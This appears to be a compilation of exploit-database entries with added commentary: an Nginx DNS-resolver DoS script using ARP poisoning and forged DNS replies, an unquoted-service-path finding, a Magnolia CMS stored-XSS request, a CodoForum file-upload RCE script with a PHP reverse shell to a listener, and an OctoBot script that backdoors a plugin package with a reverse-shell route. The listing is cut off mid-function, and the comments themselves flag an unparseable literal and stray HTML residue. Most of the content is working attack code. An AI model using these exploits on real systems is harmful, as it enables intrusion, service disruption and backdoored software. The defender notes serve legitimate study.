
# Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)
# Date: 2022-6-29
# Exploit Author: Mohammed Alshehri - https://Github.com/M507
# Vendor Homepage: https://nginx.org/
# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0
# Version: 0.6.18 - 1.20.0
# Tested on: Ubuntu 18.04.4 LTS bionic 
# CVE: CVE-2021-23017
# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn
# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1
# The service needs to be configured to use Nginx resolver

from scapy.all import *
from multiprocessing import Process
from binascii import hexlify, unhexlify
import argparse, time, os

def device_setup():
    """Prepare this host to sit between the target and its DNS server.

    Both commands are run through os.system() and need root; their exit
    status is ignored. The changes are host-wide and nothing in this script
    reverts them:
      * enables IPv4 forwarding so traffic redirected here by ARPP() is
        passed on instead of dropped;
      * appends a FORWARD rule dropping forwarded UDP/53, so the target's
        DNS queries are seen by the sniffer in exploit() but never reach
        the real resolver — only the forged reply built in
        process_received_packet() goes back.
    """
    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")
    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")

def ARPP(target, dns_server):
    """Continuously poison the ARP caches of `target` and `dns_server`.

    Every 2 seconds two unsolicited ARP replies (op=2) are sent: one telling
    `target` that `dns_server`'s IP lives at this host, and one telling
    `dns_server` that `target`'s IP lives here. hwsrc is not set, so scapy's
    default (presumably this host's interface MAC) is used. The loop never
    ends and nothing restores the real mappings on exit, so both hosts stay
    mis-mapped until their ARP entries age out.

    Detection note: periodic unsolicited replies that change an existing
    IP->MAC binding are exactly what ARP-inspection tooling (arpwatch,
    switch-side dynamic ARP inspection) alerts on.

    Args:
        target: IPv4 address of the nginx host whose resolver is attacked.
        dns_server: IPv4 address of the resolver the target uses.
    """
    print("[*] Sending poisoned ARP packets")
    # Resolved once up front. getmacbyip() yields None when the host does
    # not answer ARP; that case is not checked here.
    target_mac = getmacbyip(target)
    dns_server_mac = getmacbyip(dns_server)
    while True:
        time.sleep(2)
        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)
        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)

def exploit(target):
    """Sniff the target's UDP/53 traffic and pass every packet to process_received_packet().

    The BPF filter is built by string concatenation, so `target` is trusted
    to be a plain IPv4 address (it comes from the command line). sniff()
    blocks forever. Note that process_received_packet() filters on the
    module-level `target_ip` global set in main(), not on this parameter.
    """
    print("[*] Listening ")
    sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)

"""
RFC schema
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|             LENGTH            |               ID              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ANCOUNT            |            NSCOUNT            |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|            ARCOUNT            |               QD              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AN              |               NS              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|               AR              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Fig. DNS message header. Note: the 2-byte LENGTH prefix exists only for DNS over TCP; the offsets used in process_received_packet() below assume the 12-byte UDP header (ID at offset 0, QNAME from offset 12).

"""
def process_received_packet(received_packet):
    """sniff() callback: reply to the target's DNS query with a forged, malformed CNAME answer.

    Only packets whose IP source equals the module-level `target_ip` and
    that carry a DNS question section (DNSQR) are handled. The forged reply
    keeps the query's transaction ID, QNAME, QTYPE and QCLASS and appends a
    single answer record made of fixed bytes (annotated inline). In that
    record RDLENGTH is 0x000B (11) while the name data that follows is 27
    bytes long (label length 0x18 = 24, twenty-four 0x41 bytes, compression
    pointer 0xC004). This RDLENGTH/RDATA mismatch is presumably the
    malformation that triggers CVE-2021-23017 in the nginx resolver; it is
    also the property a DNS-aware IDS rule can key on. Mitigation is on the
    nginx side (move out of the version range given in the header, or do
    not rely on the resolver on networks where DNS replies can be forged).

    Args:
        received_packet: scapy packet handed over by sniff() in exploit().

    Side effects: prints hex dumps of the query and the reply and emits one
    Ethernet frame with sendp(). Everything inside the try is guarded by a
    bare `except`, so any failure (including KeyboardInterrupt) is reduced
    to the "[-] ERROR" line.
    """
    if received_packet[IP].src == target_ip:
        if received_packet.haslayer(DNS):
            if DNSQR in received_packet:
                print("[*] the received packet: " + str(bytes_hex(received_packet)))
                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))
                try:
                    # \/    the received DNS request
                    dns_request = received_packet[DNS].build()
                    # Index of the NUL that terminates QNAME; the search starts
                    # after the 12-byte header. bytes.find() returns -1 when no
                    # terminator exists, in which case the slices below silently
                    # build a nonsense reply instead of failing.
                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)
                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))
                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))
                    payload = [
                        dns_request[0:2],  # transaction ID, copied from the query
                        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",  # flags 0x8180 (QR, RD, RA, RCODE 0); QDCOUNT=1 ANCOUNT=1 NSCOUNT=0 ARCOUNT=0
                        dns_request[12:null_pointer_index+1],  # QNAME including its terminating NUL
                        dns_request[null_pointer_index+1:null_pointer_index+3],  # QTYPE
                        dns_request[null_pointer_index+3:null_pointer_index+5],  # QCLASS
                        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",  # answer NAME = pointer to offset 12 (the question name), TYPE 5 (CNAME), CLASS 1, TTL 0x0E10
                        b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",  # RDLENGTH 0x000B (11), then a label with declared length 0x18 (24) starting with 'A' bytes ...
                        b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
                        b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"  # ... 24 'A' bytes in total, then compression pointer 0xC004
                    ]
                    
                    payload = b"".join(payload)
                    # Addresses and ports are swapped from the query so the reply
                    # goes back to the target; Ether() keeps scapy's defaults.
                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\
                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\
                        payload)
                    print("[+] dns answer: "+str(hexlify(payload)))
                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))

                    sendp(spoofed_pkt, count=1)
                    print("\n[+] malicious answer was sent")
                    print("[+] exploited\n")
                except:
                    print("\n[-] ERROR")

def main():
    """Parse the CLI, change host forwarding/firewall state, then run poisoner and sniffer in parallel.

    Sets the module-level `target_ip` global that process_received_packet()
    filters on. Neither option is marked required, so a missing --target or
    --dns_server reaches getmacbyip(None) in ARPP() unchecked. Both child
    processes run until killed — ARPP() loops forever and exploit() blocks
    in sniff() — so the join() calls never return and the changes made by
    device_setup() are never undone.
    """
    global target_ip
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", help="IP address of the target")
    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")
    args = parser.parse_args()
    target_ip = args.target
    dns_server_ip = args.dns_server
    device_setup()
    processes_list = []
    # One process per task; neither is daemonized, so Ctrl-C must reach both.
    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))
    exploitProcess = Process(target=exploit,args=(target_ip,))
    processes_list.append(ARPPProcess)
    processes_list.append(exploitProcess)
    for process in processes_list:
        process.start()
    for process in processes_list:
        process.join()

if __name__ == '__main__':
    # Default for the global read by process_received_packet(); main() overwrites it.
    target_ip = ""
    main()
            
# Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path
# Discovery Date: 2022-05-07
# Discovery by: Esant1490
# Vendor Homepage: https://drfone.wondershare.net
# Software Link : https://download.wondershare.net/drfone_full4008.exe
# Tested Version: 4.0.8
# Tested on OS: Windows 10 Pro x64 en
# Vulnerability Type: Unquoted Service Path

# Discovering the Unquoted Service Path vulnerability:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "C:\Windows\\" |findstr /i /v """

Wondershare Install Assist Service Wondershare InstallAssist
C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto

Wondershare Application Framework Service WsAppService C:\Program Files
(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto
Wondershare Application Update Service 3.0

WsAppService3 C:\Program Files
(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto

Wondershare Driver Install Service WsDrvInst C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto

# Service info:

C:\>sc qc WsDrvInst
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WsDrvInst
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Wondershare Driver Install Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:

A successful attempt to exploit this vulnerability could allow an attacker to execute
code during startup or reboot with elevated privileges (the service runs as LocalSystem,
see NOMBRE_INICIO_SERVICIO above). This requires write access to one of the unquoted
path's intermediate directories, e.g. "C:\" or "C:\Program Files (x86)\Wondershare\".
            
# Exploit Title: Magnolia CMS 6.2.19 - Stored Cross-Site Scripting (XSS)
# Date: 08/05/2022
# Exploit Author: Giulio Garzia 'Ozozuz'
# Vendor Homepage: https://www.magnolia-cms.com/
# Software Link: https://nexus.magnolia-cms.com/service/local/repositories/magnolia.public.releases/content/info/magnolia/bundle/magnolia-community-demo-webapp/6.2.19/magnolia-community-demo-webapp-6.2.19-tomcat-bundle.zip
# Version: 6.2.19
# Tested on: Linux, Windows, Docker
# CVE : CVE-2022-33098

Explanation
A malicious user with permission to upload a profile picture for a contact can upload an SVG file containing JavaScript, which is executed in the browser of anyone who opens the uploaded resource.

===== REQUEST =====
POST /magnoliaAuthor/.magnolia/admincentral/APP/UPLOAD/0/140/action/cba61868-b27a-4d50-983d-adf48b992be1 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------399178799522967017241464837908
Content-Length: 620
Connection: close
Cookie: csrf=_WLVhBj-Vv-sdc37C4GBahMJ1tPS_7o_Y1VCEEw18Ks; JSESSIONID=F2678A586264F811C2746E4138BEF34D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

-----------------------------399178799522967017241464837908
Content-Disposition: form-data; name="140_file"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert('POC - Magnolia CMS');
  </script>
</svg>

-----------------------------399178799522967017241464837908--
            
# Exploit Title: CodoForum v5.1 - Remote Code Execution (RCE)
# Date: 06/07/2022
# Exploit Author: Krish Pandey (@vikaran101)
# Vendor Homepage: https://codoforum.com/
# Software Link: https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip
# Version: CodoForum v5.1
# Tested on: Ubuntu 20.04
# CVE: CVE-2022-31854

#!/usr/bin/python3

import requests
import time
import optparse
import random
import string

banner = """
  ______     _______     ____   ___ ____  ____      _____ _  ___ ____  _  _   
 / ___\ \   / / ____|   |___ \ / _ \___ \|___ \    |___ // |( _ ) ___|| || |  
| |    \ \ / /|  _| _____ __) | | | |__) | __) |____ |_ \| |/ _ \___ \| || |_ 
| |___  \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) | | (_) |__) |__   _|
 \____|  \_/  |_____|   |_____|\___/_____|_____|   |____/|_|\___/____/   |_|  
"""

print("\nCODOFORUM V5.1 ARBITRARY FILE UPLOAD TO RCE(Authenticated)")
print(banner)
print("\nExploit found and written by: @vikaran101\n")

# Command-line options. None is marked required; presence is checked by
# hand further down. --username/--password are parsed but login() below
# does not use them (its request body carries fixed credentials).
parser = optparse.OptionParser()
parser.add_option('-t', '--target-url', action="store", dest='target', help='path of the CodoForum v5.1 install')
parser.add_option('-u', '--username', action="store", dest='username', help='admin username')
parser.add_option('-p', '--password', action="store", dest='password', help='admin password')
parser.add_option('-i', '--listener-ip', action="store", dest='ip', help='listener address')
parser.add_option('-n', '--port', action="store", dest='port', help='listener port number')

options, args = parser.parse_args()

# Every request except the one in getPHPSESSID() is routed through this
# hard-coded local proxy (an interception proxy on 8080, presumably). With
# nothing listening there, requests raises a connection error.
proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

# Manual required-argument check; exit() is the site-module helper.
if not options.target or not options.username or not options.password or not options.ip or not options.port:
    print("[-] Missing arguments!")
    print("[*] Example usage: ./exploit.py -t [target url] -u [username] -p [password] -i [listener ip] -n [listener port]")
    print("[*] Help menu: ./exploit.py -h OR ./exploit.py --help")
    exit()

# Admin login page, the global-settings form the upload goes through, and
# the web-reachable directory where the uploaded "logo" ends up. For
# defenders: a .php file under that last path is the artefact to look for.
loginURL = options.target + '/admin/?page=login'
globalSettings = options.target + '/admin/index.php?page=config'
payloadURL = options.target + '/sites/default/assets/img/attachments/'

session = requests.Session()

# Ten random lowercase letters used as the uploaded file's base name;
# `random` (not `secrets`) is adequate since it only needs to avoid collisions.
randomFileName = ''.join((random.choice(string.ascii_lowercase) for x in range(10)))

def getPHPSESSID():
    """Fetch the login page once and return the value of the first Set-Cookie entry.

    The first cookie in `Set-Cookie` is assumed to be PHPSESSID; its name
    is not checked. Unlike the other requests in this file, this one does
    not go through `proxy`. Any failure — connection error, missing
    Set-Cookie header, unexpected format — is caught by the bare `except`
    and ends the script via exit() without a message. The value is taken
    before login(), i.e. it is a pre-authentication session id.
    """
    
    try:
        get_PHPID = session.get(loginURL)
        headerDict = get_PHPID.headers
        # "name=value; Path=/; ..." -> "value"
        cookies = headerDict['Set-Cookie'].split(';')[0].split('=')[1]
        return cookies
    except:
        exit()

# Captured at script start, before login(); reused as the PHPSESSID cookie in uploadAndExploit().
phpID = getPHPSESSID()

def login():
    """POST a multipart login to the admin page using the module-level `session`.

    Defects worth knowing about: the multipart body is a fixed literal
    whose username and password fields are both "admin" — `options.username`
    and `options.password` are never used; the parts are separated with
    "\n" rather than CRLF; and a fixed Content-Length of 295 is supplied by
    hand. Success is only reported by a print when the dashboard title is
    in the response; failure is silent and execution continues.
    """
    send_cookies = {'cf':'0'}
    send_headers = {'Host': loginURL.split('/')[2], 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8','Accept-Language':'en-US,en;q=0.5','Accept-Encoding':'gzip, deflate','Content-Type':'multipart/form-data; boundary=---------------------------2838079316671520531167093219','Content-Length':'295','Origin':loginURL.split('/')[2],'Connection':'close','Referer':loginURL,'Upgrade-Insecure-Requests':'1'}
    send_creds = "-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"username\"\n\nadmin\n-----------------------------2838079316671520531167093219\nContent-Disposition: form-data; name=\"password\"\n\nadmin\n-----------------------------2838079316671520531167093219--"
    auth = session.post(loginURL, headers=send_headers, cookies=send_cookies, data=send_creds, proxies=proxy)

    if "CODOFORUM | Dashboard" in auth.text:
        print("[+] Login successful")

def uploadAndExploit():
    """Submit the admin global-settings form with a .php file as the forum logo, then request it.

    The multipart body hard-codes every settings field, a fixed CSRF_token
    literal (instance-specific), and a "forum_logo" part named
    <randomFileName>.php with Content-Type application/x-php whose content
    is a PHP one-liner that opens a reverse shell to options.ip:options.port.
    The POST is made with a plain requests.post() carrying an explicit
    PHPSESSID cookie captured before login (not the logged-in `session`),
    and its response is assigned to `exploit` but never inspected. The
    follow-up GET of payloadURL + name treats a 200 as success.

    For defenders: the indicators are an admin settings change whose logo
    file name ends in .php, and .php files under
    /sites/default/assets/img/attachments/.
    NOTE(review): in this listing the body literal is split across two
    physical lines; as shown it does not parse.
    """
    send_cookies = {'cf':'0', 'user_id':'1', 'PHPSESSID':phpID}
    send_headers = {'Content-Type':'multipart/form-data; boundary=---------------------------7450086019562444223451102689'}
    send_payload = '\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_title"\n\nCODOLOGIC\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="site_description"\n\ncodoforum - Enhancing your forum experience with next generation technology!\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="admin_email"\n\nadmin@codologic.com\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="default_timezone"\n\nEurope/London\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="register_pass_min"\n\n8\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_all_topics"\n\n30\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_cat_topics"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="num_posts_per_topic"\n\n20\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_path"\n\nassets/img/attachments\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_exts"\n\njpg,jpeg,png,gif,pjpeg,bmp,txt\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_size"\n\n3\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_attachments_mimetypes"\n\nimage/*,text/plain\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_tags_num"\n\n5\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; 
name="forum_tags_len"\n\n15\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="reply_min_chars"\n\n10\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="insert_oembed_videos"\n\nyes\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_privacy"\n\neveryone\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'
    exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)

    print("[*] Checking webshell status and executing...")
    # A 200 here is taken as "uploaded and executed"; the body is not checked.
    payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)
    if payloadExec.status_code == 200:
        print("[+] Payload uploaded successfully and executed, check listener")
    else:
        print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")
# Script body: authenticate, then upload the file and probe for it.
login()
uploadAndExploit()
            
# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
# Date: 9/2/2021
# Exploit Author: Samy Younsi, Thomas Knudsen
# Vendor Homepage: https://www.octobot.online/
# Software Link: https://github.com/Drakkar-Software/OctoBot
# Version: 0.4.0beta3 - 0.4.3
# Tested on: Linux (Ubuntu, CentOs)
# CVE : CVE-2021-36711

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import zipfile
import time
import sys
import os

def banner():
  """Print the colourised ASCII-art banner to stdout.

  Returns the result of print(), i.e. None. The logo string carries its
  own ANSI escapes and is wrapped in a blue colour code on output.
  """
  sashimiLogo = """
                              _________         .    .
                             (..       \_    ,  |\  /|
                              \       O  \  /|  \ \/ /
                               \______    \/ |   \  / 
                                  vvvv\    \ |   /  |
  _         _  _     _            \^^^^  ==   \_/   |
 | |  __ _ | || |__ (_)_ __ ___ (_)`\_   ===    \.  |
/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_   \ /      |
\__ | (_| \__ | | | | | | | | | | ||/   \_  \|      /
(   /\__,_(   |_| |_|_|_| |_| |_|_|       \________/
 |_|       |_|                       \033[1;91mOctoBot Killer\033[1;m                  
Author: \033[1;92mNaqwada\033[1;m                         
RuptureFarm 1029      

                FOR EDUCATIONAL PURPOSE ONLY.   
  """
  return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))


def help():
  """Print the usage text for this script to stdout.

  Shadows the builtin help(); kept under this name because the
  argument-parser setup at the bottom of the file refers to it.
  """
  script_name = sys.argv[0]
  usage_lines = (
    '[!] \033[1;93mUsage: \033[1;m',
    '[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(script_name),
    '[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.',
  )
  for line in usage_lines:
    print(line)


def getOctobotVersion(RHOST, RPORT):
  """Request the target's /api/version endpoint through curl() and return the Response.

  Args:
    RHOST: target host or IP.
    RPORT: target port; 443 selects https, any other value plain http.
  """
  scheme = 'https' if RPORT == 443 else 'http'
  version_url = '{}://{}:{}/api/version'.format(scheme, RHOST, RPORT)
  return curl(version_url)


def restartOctobot(RHOST, RPORT):
  """Hit /commands/restart on the target and wait for it to come back.

  A requests ConnectionError is interpreted as "restart under way" and is
  followed by a fixed 30 s sleep. Any other outcome (a normal reply, or an
  exception that is not a ConnectionError, e.g. a read timeout beyond the
  1 s limit) produces no message and no wait. verify=False disables TLS
  certificate checks, as in curl().
  """
  if RPORT == 443:
    url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)
  else:
    url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)
  
  try:
    requests.get(url, allow_redirects=False, verify=False, timeout=1)
  except requests.exceptions.ConnectionError as e: 
    print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m')
    time.sleep(30)


def downloadTentaclePackage(octobotVersion):
  """Download the official tentacle bundle for `octobotVersion` to ./<version>.zip.

  `octobotVersion` comes straight from the target's /api/version reply
  (see main()), so a hostile target controls both the URL path component
  and the local file name — no sanitisation is applied to either. The
  HTTP status is never checked (no raise_for_status), so an error page
  would be written to disk as the zip and only fail later in
  unzipTentaclePackage().
  """
  print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))
  url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)
  result = requests.get(url, stream=True)
  with open('{}.zip'.format(octobotVersion), 'wb') as fd:
    for chunk in result.iter_content(chunk_size=128):
        fd.write(chunk)
  print('[+] \033[1;92mDownload completed!\033[1;m')


def unzipTentaclePackage(octobotVersion):
  """Extract ./<version>.zip into ./quests and delete the archive.

  `zip` shadows the builtin and the ZipFile is never closed explicitly
  (no `with`). Member paths are trusted beyond zipfile's own sanitisation,
  which matters because the archive was just fetched over the network in
  downloadTentaclePackage().
  """
  zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))
  zip.extractall('quests')
  os.remove('{}.zip'.format(octobotVersion))
  print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')


def craftBackdoor(octobotVersion):
  """Modify the extracted official package under quests/ so that it carries an extra API route.

  `path` is the web-interface api directory inside the extracted tree;
  injectInitFile() and injectMetadataFile() edit two files there in
  place. For defenders: the resulting package differs from the official
  one only in api/__init__.py and api/metadata.py, so comparing installed
  tentacles against the vendor archive (file hashes) exposes it.
  `octobotVersion` is only used in the messages here.
  """
  print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))
  path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'
  injectInitFile(path)
  injectMetadataFile(path)
  print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))


def injectMetadataFile(path):
  """Rewrite api/metadata.py in the extracted package to add a '/sashimi' route.

  Two textual replacements on the original source: extra imports after
  'import json', and a new flask route inserted in front of the existing
  '/announcements' route. The inserted handler connects a socket to the
  LHOST/LPORT given in the query string and attaches a shell to it, i.e.
  once installed the package is a remotely triggerable backdoor.
  ''.join() applied to a str is a no-op. Neither replace() result is
  checked, so if an anchor string is missing the file is rewritten
  unchanged.
  """
  with open('{}metadata.py'.format(path),'r') as metadataFile:
    content = metadataFile.read()
    addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))
    addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))
  with open('{}metadata.py'.format(path),'w') as newMetadataFile:
    newMetadataFile.write(addPayload)


def injectInitFile(path):
  """Register the added 'sashimi' route in the package's api/__init__.py.

  Inserts 'sashimi' after 'announcements' both in the import list and in
  the quoted name list via two str.replace() calls, then overwrites the
  file. No check that the anchors were found. ''.join() on a str is a
  no-op here.
  """
  with open('{}__init__.py'.format(path),'r') as initFile:
    content = initFile.read()
    addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))
    addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))
  with open('{}__init__.py'.format(path),'w') as newInitFile:
    newInitFile.write(addPayload)


def rePackTentaclePackage():
  """Zip the modified ./quests tree into ./any_platform.zip (overwriting any existing file).

  Member names are the file paths with the leading 'quests' cut off,
  which leaves a leading path separator; ZipFile.write() strips leading
  separators when it builds the member name, so entries end up relative.
  """
  print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')
  with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:
    len_dir_path = len('quests')
    for root, _, files in os.walk('quests'):
        for file in files:
            file_path = os.path.join(root, file)
            zipf.write(file_path, file_path[len_dir_path:])


def uploadMaliciousTentacle():
  """Upload ./any_platform.zip to anonfiles.com and return the direct download link.

  The API's JSON reply gives a landing-page URL; that page is fetched and
  parsed with BeautifulSoup for the element with id 'download-url'. A
  non-2xx reply or a changed schema raises (KeyError / AttributeError)
  uncaught, and the file handle opened for the upload is never closed.
  Note that the repacked package is published on a public file host, so
  the backdoored archive is retrievable by anyone who learns the URL —
  which is then also sent to the target in injectBackdoor().
  NOTE(review): the print() below seems to contain HTML residue
  (`" link="https://app.recordedfuture.com/..." style=""`) from wherever
  this listing was copied; it is unlikely to be part of the original.
  """
  print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m')

  file = {
      'file': open('any_platform.zip', 'rb'),
  }
  response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)
  zipLink = response.json()['data']['file']['url']['full']
  # 'full' is a landing page, not the file; scrape the real link from it.
  response = requests.get(zipLink, timeout=60)
  soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
  zipLink = soup.find(id='download-url').get('href')
  print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))
  return zipLink

def curl(url):
  """GET `url` without following redirects and return the Response.

